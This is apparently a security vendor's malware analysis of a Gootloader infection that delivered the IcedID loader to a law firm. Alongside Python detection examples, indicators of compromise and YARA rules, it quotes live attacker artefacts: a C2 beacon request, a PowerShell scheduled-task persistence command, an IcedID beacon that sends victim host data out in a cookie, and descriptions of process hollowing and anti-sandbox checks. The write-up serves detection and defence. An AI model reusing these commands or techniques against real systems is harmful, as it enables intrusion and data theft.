Gootloader is a Malware-as-a-Service (MaaS) offering that is spread through Search Engine Optimization (SEO) poisoning to distribute malicious payloads, such as IcedID. Threat actors have begun using IcedID, a former banking trojan, since it’s a stealthier option compared to Cobalt Strike.
In fact, the eSentire Threat Response Unit (TRU) team recently published a security advisory, The Popular Malware Downloader, GootLoader, Expands its Payloads Yet Again, Infecting a Law Firm with IcedID, that outlined TRU’s discovery of threat actors deploying IcedID into a law firm’s IT environment via an employee’s computer. Our team of 24/7 Cyber SOC Analysts isolated the infected endpoint immediately and, after cleaning it, worked with TRU to identify the malware as IcedID.
This malware analysis is a deeper technical dive of how Gootloader and IcedID are deployed and our security recommendations to protect your organization from being exploited.
eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable incident delivered an IcedID loader. The malware targets domain-joined machines. The infection starts with the user visiting a compromised website that lures them into downloading a ZIP file. The ZIP archive contains a malicious JavaScript file that reaches out to one of three hardcoded domains to retrieve the second-stage payload.
As mentioned previously, the infection starts when a user visits a compromised website and downloads a ZIP archive containing a highly obfuscated malicious JavaScript file. In most cases the filename includes the keyword “agreement”. Gootloader relies on SEO poisoning to deliver the initial payload, as shown in Exhibit 1.
When visiting one of the many compromised websites, the user is served a Gootloader landing page that includes the link to the malicious ZIP archive (Exhibit 2). Because the user’s location and browser information are recorded during the visit, a user who later visits another infected page will not be served a second Gootloader payload.
The JavaScript file within the ZIP archive decodes itself at runtime and reaches out to one of the three hardcoded compromised websites.
The script checks whether the infected host is joined to an Active Directory domain by reading the environment variable %USERDNSDOMAIN%, which holds the DNS name of the domain the logged-on user belongs to and is not set on workgroup machines. If the variable is set (i.e. the host is domain joined), the value “4173581” is appended to the numeric parameter of the GET request sent to the C2 server, which is why the request below ends in those digits. If a C2 server from the hardcoded list (held in the script’s L parameter) doesn’t respond with status code 200, the script sleeps for 23.232 seconds (23232 milliseconds) and attempts the next URL (Exhibit 3).
The GET request (on a domain-joined machine):

    GET /test.php?cvtbyyxsqwsw=201492074208614154173581 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: www[.]liveshopping-aktuell[.]de
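Turning that request into a detection, as an added example that is not part of the original advisory: the Python below runs over a few constructed proxy log lines (timestamp, client, method, URL, status, User-Agent) and flags the Gootloader first-stage pattern, a GET to /test.php with a single all-digit query parameter under the WinHttp.WinHttpRequest.5 User-Agent (the default identity of the WinHTTP COM object that Windows Script Host code uses, so it rarely shows up in normal browsing). It marks requests carrying the trailing 4173581 domain-joined marker and pairs a failed attempt with the same client’s next attempt 23.232 seconds later. The log layout, the sample lines and the assumption that the parameter name is a random lowercase string are the example’s own.

```python
import re
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Telltale values taken from the request shown on the page
GOOTLOADER_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
DOMAIN_MARKER = "4173581"       # appended to the numeric value when %USERDNSDOMAIN% is set
RETRY_SECONDS = 23.232          # sleep before trying the next C2 after a non-200 reply
PARAM_NAME_RE = re.compile(r"^[a-z]{8,20}$")   # assumption: random lowercase parameter name

# Constructed proxy log lines (not from the advisory): timestamp client method url status user-agent
SAMPLE_LOG = """\
2022-05-30T14:02:11 10.1.5.23 GET http://www.liveshopping-aktuell.de/test.php?cvtbyyxsqwsw=201492074208614154173581 504 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
2022-05-30T14:02:34 10.1.5.23 GET http://www.lightnessofbeing.net/test.php?cvtbyyxsqwsw=201492074208614154173581 200 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
2022-05-30T14:05:02 10.1.5.40 GET http://www.lintelconsulting.co.uk/test.php?qpzmxnvbasdf=20149207420861415 200 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
2022-05-30T14:05:09 10.1.5.40 GET http://www.example.com/test.php?id=42 200 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/101.0
"""


def parse_line(line):
    """Split one log line into a record; the User-Agent is the free-text tail."""
    ts, client, method, url, status, ua = line.split(maxsplit=5)
    return {"ts": datetime.fromisoformat(ts), "client": client, "method": method,
            "url": url, "status": int(status), "ua": ua}


def classify_beacon(rec):
    """Return a finding if the record looks like the Gootloader first-stage GET, else None."""
    if rec["method"] != "GET" or rec["ua"] != GOOTLOADER_UA:
        return None
    parts = urlsplit(rec["url"])
    if not parts.path.endswith("/test.php"):
        return None
    params = parse_qsl(parts.query)
    if len(params) != 1:
        return None
    name, value = params[0]
    if not (PARAM_NAME_RE.match(name) and value.isdigit()):
        return None
    return {"ts": rec["ts"], "client": rec["client"], "host": parts.hostname,
            "status": rec["status"], "domain_joined": value.endswith(DOMAIN_MARKER)}


def find_beacons(log_text):
    findings = []
    for line in log_text.splitlines():
        if line.strip():
            finding = classify_beacon(parse_line(line))
            if finding:
                findings.append(finding)
    return findings


def retry_chains(findings, tolerance=1.0):
    """Pair a non-200 beacon with the same client's next beacon ~23.232 s later."""
    by_client = {}
    for f in findings:
        by_client.setdefault(f["client"], []).append(f)
    chains = []
    for client, seq in by_client.items():
        seq.sort(key=lambda f: f["ts"])
        for prev, nxt in zip(seq, seq[1:]):
            gap = (nxt["ts"] - prev["ts"]).total_seconds()
            if prev["status"] != 200 and abs(gap - RETRY_SECONDS) <= tolerance:
                chains.append((client, prev["host"], nxt["host"], gap))
    return chains


if __name__ == "__main__":
    beacons = find_beacons(SAMPLE_LOG)
    for f in beacons:
        print(f"{f['ts']} {f['client']} -> {f['host']} status={f['status']} domain_joined={f['domain_joined']}")
    for client, first, second, gap in retry_chains(beacons):
        print(f"{client}: {first} failed, retried {second} after {gap:.3f}s")
```

The User-Agent match is the strongest single signal: WinHttp.WinHttpRequest.5 identifies script-driven WinHTTP traffic, so it is worth alerting on it alone from workstations and using the /test.php shape and the retry cadence to raise confidence.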
Upon successful communication with the C2 channel, Gootloader serves the second-stage payloads to the infected host from one of the compromised websites within 2 minutes of the JavaScript file’s execution. The first, encoded main payload is written to the registry under HKEY_CURRENT_USER\SOFTWARE\Microsoft\username\ (where username stands for the name of the logged-on user) by the wscript.exe process using the WScript.Shell RegWrite method (Exhibits 4-5).
The second payload is written to HKEY_CURRENT_USER\SOFTWARE\Microsoft\username0\ (Exhibit 6). It is a 32-bit .NET DLL (Dynamic Link Library) written in C# and named powershell.dll. This C# payload decodes the main payload by replacing ASCII characters with numeric values inside its Test class (Exhibit 7).
eSentire TRU previously observed Gootloader writing Cobalt Strike payloads under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username0\ and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username\ registry keys.
Gootloader uses process hollowing (replacing the legitimate executable section of a process with malicious code after unmapping its memory) to inject the main payload into a PowerShell process through its Foad class, calling APIs such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory and ResumeThread, as shown in Exhibit 8. Previously, GootLoader was observed injecting payloads into the ImagingDevice.exe process.
In some cases we have observed a scheduled task created as a persistence mechanism; its script decodes the registry values by replacing “#” with “1000” and reflectively loads the second decoder payload in memory. The script is base64-encoded and executed via PowerShell (Exhibits 9-10).
The following code block is responsible for creating the scheduled task. The task is named after the username, and PowerShell accepts abbreviated parameter names, so -In, -Ac, -Tr, -E, -Ar, -AtL and -U stand for -InputObject, -Action, -Trigger, -Execute, -Argument, -AtLogOn and -User; $ibs (the executable) and $zb (its argument string) are defined elsewhere in the script:

    $yl=$env:USERNAME;Register-ScheduledTask $yl -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E $ibs -Ar $zb) -Tr (New-ScheduledTaskTrigger -AtL -U $yl))
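The task-creation script reaches PowerShell as an -EncodedCommand argument, which is base64 over UTF-16LE text rather than UTF-8, a detail that defeats naive decoders. The Python below, added here as an example and not code from the advisory, encodes the one-liner above the way PowerShell expects (the switches around it in the sample command line are constructed), decodes it back out of a process-creation command line, and matches the persistence pattern while tolerating PowerShell’s abbreviated parameter names (-AtL for -AtLogOn, -U for -User) and the -e/-ec/-enc forms of the encoded-command switch.

```python
import base64
import re

# The task-registration one-liner from the advisory, used here as the sample script to encode
TASK_SCRIPT = ("$yl=$env:USERNAME;Register-ScheduledTask $yl -In (New-ScheduledTask "
               "-Ac (New-ScheduledTaskAction -E $ibs -Ar $zb) "
               "-Tr (New-ScheduledTaskTrigger -AtL -U $yl))")


def encode_powershell(script):
    """powershell.exe -EncodedCommand takes base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed process-creation command line (the surrounding switches are the example's choice)
SAMPLE_CMDLINE = "powershell.exe -NoP -w hidden -e " + encode_powershell(TASK_SCRIPT)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; -e, -ec and -enc are the usual ones
ENC_FLAG_RE = re.compile(r"^-e(c|nc|ncodedcommand)?$", re.I)

# Patterns written against the abbreviations PowerShell tolerates: -AtL(ogOn), -U(ser)
PERSISTENCE_RULES = {
    "registers_task": re.compile(r"\bRegister-ScheduledTask\b", re.I),
    "logon_trigger": re.compile(r"New-ScheduledTaskTrigger\s+[^)]*-AtL", re.I),
    # a variable assigned from $env:USERNAME is later reused as the task name
    "task_named_after_user": re.compile(
        r"(\$\w+)\s*=\s*\$env:USERNAME.*?Register-ScheduledTask\s+\1(?!\w)", re.I | re.S),
}


def decode_encoded_command(cmdline):
    """Return the decoded script when the command line carries an encoded command, else None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if ENC_FLAG_RE.match(flag):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze_cmdline(cmdline):
    """Decode the script (if any) and report which persistence rules it matches."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "script": None, "matches": []}
    matches = [name for name, rx in PERSISTENCE_RULES.items() if rx.search(script)]
    return {"encoded": True, "script": script, "matches": matches}


if __name__ == "__main__":
    result = analyze_cmdline(SAMPLE_CMDLINE)
    print("decoded:", result["script"])
    print("matches:", result["matches"])
```

Feeding Sysmon event 1 or Windows event 4688 command lines through analyze_cmdline gives you the decoded script for review; the same three rules also work as-is against PowerShell script-block logs (event 4104), where the script arrives already decoded.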
eSentire TRU was able to identify the main payload as IcedID.
The sample was compiled on May 25th, 2022, five days before the infection. The packed sample is 147 KB in size (MD5: 157d12885e5f6434436862aadd6224cd) and was built with MinGW GCC. The unpacked sample is only 16 KB in size (MD5: 578143ef946796590c0dd5f5dcfdada7).
IcedID uses timing-based anti-VM/anti-sandbox checks: it reads the processor’s time stamp counter with the RDTSC instruction around the CPUID instruction and SwitchToThread API calls, repeating the measurement in a loop so that the comparison of execution times is accurate enough to tell a sandbox or virtual machine from real hardware (Exhibit 11).
IcedID gathers information about the infected machine and sends it in the Cookie header of a GET request, as shown below:

    GET / HTTP/1.1
    Connection: Keep-Alive
    Cookie: __gads=1073741824:1:352:136; __gat=10.0.19043.64; _ga=1.591597.1635208534.1946; _u=4445534B544F502D5043373941514B:73616C6573; __io=21_3122393604_3742086262_449295377; _gid=0068595A4472
    Host: ilekvoyn[dot]com
Breakdown of the Cookie parameters:
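The page’s breakdown is an image not reproduced in this text version, so here is an added example (not code from the advisory) that parses the captured Cookie header and decodes the fields that decode cleanly. The _u value is two hex blobs separated by a colon and comes out as DESKTOP-PC79AQK and sales, which reads as hostname:username; _gid is 12 hex digits, the size of a MAC address; __gat looks like a Windows version in major.minor.build.bitness form. Those three interpretations are inferred from the decoded values, not stated on the page. The is_icedid_cookie check keys on the cookie names only, which is what the YARA rule at the end of the page does too.

```python
# Cookie header from the beacon captured on the page (the C2 host is not needed here)
SAMPLE_COOKIE = ("__gads=1073741824:1:352:136; __gat=10.0.19043.64; "
                 "_ga=1.591597.1635208534.1946; "
                 "_u=4445534B544F502D5043373941514B:73616C6573; "
                 "__io=21_3122393604_3742086262_449295377; _gid=0068595A4472")

# The six cookie names the IcedID loader sets in this sample
ICEDID_COOKIE_NAMES = {"__gads", "__gat", "_ga", "_u", "__io", "_gid"}


def parse_cookie(header):
    """Split 'k=v; k=v' into a dict; values keep their own ':' and '_' separators."""
    fields = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" in part:
            name, value = part.split("=", 1)
            fields[name] = value
    return fields


def is_icedid_cookie(header):
    """True when every IcedID cookie name is present (names, not values, so it survives value rotation)."""
    return ICEDID_COOKIE_NAMES <= set(parse_cookie(header))


def hex_to_ascii(hexstr):
    """Decode a hex blob; returns None if it is not hex or not printable ASCII."""
    try:
        text = bytes.fromhex(hexstr).decode("ascii")
    except ValueError:          # UnicodeDecodeError is a ValueError subclass
        return None
    return text if text.isprintable() else None


def decode_beacon(header):
    """Extract the host-identifying fields; interpretations are inferred, see the lead-in."""
    fields = parse_cookie(header)
    out = {"raw": fields}
    # _u: two hex blobs separated by ':'; decoded they read as hostname and username
    if "_u" in fields:
        host_hex, _, user_hex = fields["_u"].partition(":")
        out["hostname"] = hex_to_ascii(host_hex)
        out["username"] = hex_to_ascii(user_hex)
    # _gid: 12 hex digits = 6 bytes, the length of a MAC address (interpretation)
    gid = fields.get("_gid", "")
    if len(gid) == 12 and all(c in "0123456789abcdefABCDEF" for c in gid):
        out["mac"] = ":".join(gid[i:i + 2] for i in range(0, 12, 2)).lower()
    # __gat: dotted version string that reads as Windows major.minor.build.bitness (interpretation)
    if "__gat" in fields:
        out["os_version"] = fields["__gat"]
    return out


if __name__ == "__main__":
    print("IcedID cookie shape:", is_icedid_cookie(SAMPLE_COOKIE))
    for key, value in decode_beacon(SAMPLE_COOKIE).items():
        if key != "raw":
            print(f"{key}: {value}")
```

Run against proxy or IDS logs, the decoded hostname and username tell the responder which machine and account beaconed without having to pull the endpoint first; the cookie-name check is the part to turn into a network signature, since the values change per victim.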
After successfully connecting to the C2 server, IcedID drops the payload in the ProgramData folder (Exhibits 16-17).
As we can see, the unpacked IcedID payload is small, but it contains the capabilities the threat actor(s) need to fetch a secondary payload from the C2 server. IcedID has previously been observed delivering Cobalt Strike, Conti ransomware, Quantum ransomware and XingLocker ransomware.
Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create positive security outcomes for our customers. We take a holistic approach to combat modern cybersecurity threats by deploying countermeasures, such as:
Our detection content is supported by investigation runbooks, ensuring our 24/7 Cyber SOC Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape, constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.
We recommend implementing the following controls to help secure your organization against Gootloader and IcedID malware:
While the TTPs used by adversaries grow in sophistication, they force defenders into a position where critical business decisions must be made. Preventing the attack paths used by the modern threat actor requires actively monitoring the threat landscape, developing and deploying endpoint detections, and being able to investigate logs and network data during active intrusions.
eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.
Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.
Name | Indicator
--- | ---
IcedID packed payload (MD5) | 157d12885e5f6434436862aadd6224cd
IcedID unpacked payload (MD5) | 578143ef946796590c0dd5f5dcfdada7
IcedID C2 | ilekvoyn[dot]com
Gootloader C2 | www[dot]liveshopping-aktuell[dot]de
Gootloader C2 | www[dot]lightnessofbeing[dot]net
Gootloader C2 | www[dot]lintelconsulting[dot]co[dot]uk
Gootloader initial payload (ZIP archive): employee confidentiality agreement texas(9898).zip (MD5) | 1c822f5a7d92307f9cf8ad5f28f61a76
Gootloader initial payload (JavaScript file): employee_confidentiality_agreement_texas 19855.js (MD5) | c6bac95375b8c7fb3b16c7dff98d2cc0
IcedID campaign ID | 277708695
    rule gootloader_JS {
        meta:
            description = "Detects Gootloader JavaScript file"
            author = "eSentire TI"
            date = "06/13/2022"
        strings:
            $a = "w+"
            $a1 = "x\\"
            $a2 = "Sp"
            $a3 = "E\\"
            $a4 = "function"
            $a5 = "while"
        condition:
            all of ($a*) and filesize < 300KB
    }

    rule IcedID_loader {
        meta:
            description = "Detects IcedID loader"
            author = "eSentire TI"
            date = "06/13/2022"
        strings:
            $a = "oCookie: _s=" wide fullword nocase
            $a1 = "Cookie: __gads=" wide fullword nocase
            $a2 = "oCookie: _s=" wide fullword nocase
            $a3 = "__io=" wide fullword nocase
            $a4 = {63 3A 5C 50 72 6F 67 72 61 6D 44 61 74 61 5C}
            $a5 = {3B 00 20 00 5F 00 67 00 61 00 3D}
            $a6 = {3B 00 20 00 5F 00 67 00 69 00 64 00 3D}
            $a7 = {3B 00 20 00 5F 00 67 00 61 00 74 00 3D}
        condition:
            all of ($a*) and filesize < 20KB
    }
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.